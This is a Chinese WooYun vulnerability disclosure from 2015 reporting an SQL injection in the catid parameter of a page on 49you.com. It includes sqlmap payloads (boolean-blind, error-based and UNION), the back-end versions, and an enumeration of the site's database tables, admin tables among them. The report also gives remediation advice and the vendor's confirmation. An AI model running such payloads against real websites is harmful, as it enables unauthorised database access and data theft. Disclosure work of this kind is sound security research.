当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122803

漏洞标题:49you某业务SQL注射漏洞

相关厂商:49you.com

漏洞作者: xyang

提交时间:2015-06-26 09:33

修复时间:2015-08-13 10:04

公开时间:2015-08-13 10:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

厂商说真心的,我也是真心帮厂商的:)

详细说明:

问题地址:

http://i.49you.com/news/item/catid/55/id/15.html


问题参数:catid
加单引号报错

811F170B-EF2E-4DB8-9C5D-731F3B2376CC.png


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55 AND 3684=3684/id/15.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://i.49you.com:80/news/item/catid/55 AND (SELECT 4621 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(4621=4621,1))),0x716a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)/id/15.html
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: http://i.49you.com:80/news/item/catid/55 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x6b4a4c4e7a5864654f71,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- /id/15.html
---
[23:37:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0


current database: 'i_49you'
current user: 'i_49you@%'


跑跑数据

admin.png


Database: i_49you
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| linkage | 3284 |
| log | 2243 |
| menu | 331 |
| model_field | 211 |
| attachment | 148 |
| attachment_index | 106 |
| category_priv | 103 |
| keyword_data | 65 |
| admin_role_priv | 61 |
| keyword | 49 |
| cache | 40 |
| hits | 34 |
| search | 34 |
| `module` | 26 |
| category | 19 |
| poster | 17 |
| type | 16 |
| news | 11 |
| news_data | 11 |
| model | 10 |
| link | 8 |
| urlrule | 8 |
| member_group | 7 |
| poster_space | 6 |
| test_artice_data | 6 |
| game | 5 |
| game_data | 5 |
| page | 5 |
| sso_settings | 5 |
| test_artice | 5 |
| workflow | 4 |
| admin | 3 |
| member_menu | 3 |
| site | 3 |
| admin_role | 2 |
| test_picture | 2 |
| test_picture_data | 2 |
| `session` | 1 |
| sso_admin | 1 |
| sso_applications | 1 |
| wap | 1 |
+-------------------+---------+

漏洞证明:

如上

修复方案:

1、过滤参数catid
2、屏蔽网站报错信息
我不知道值多少钱,交给厂商

版权声明:转载请注明来源 xyang@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-29 10:02

厂商回复:

非常感谢白帽子童鞋 @xyang ,技术正常紧急修复中

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-26 11:36 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    希望别重复,感觉主站已经挂了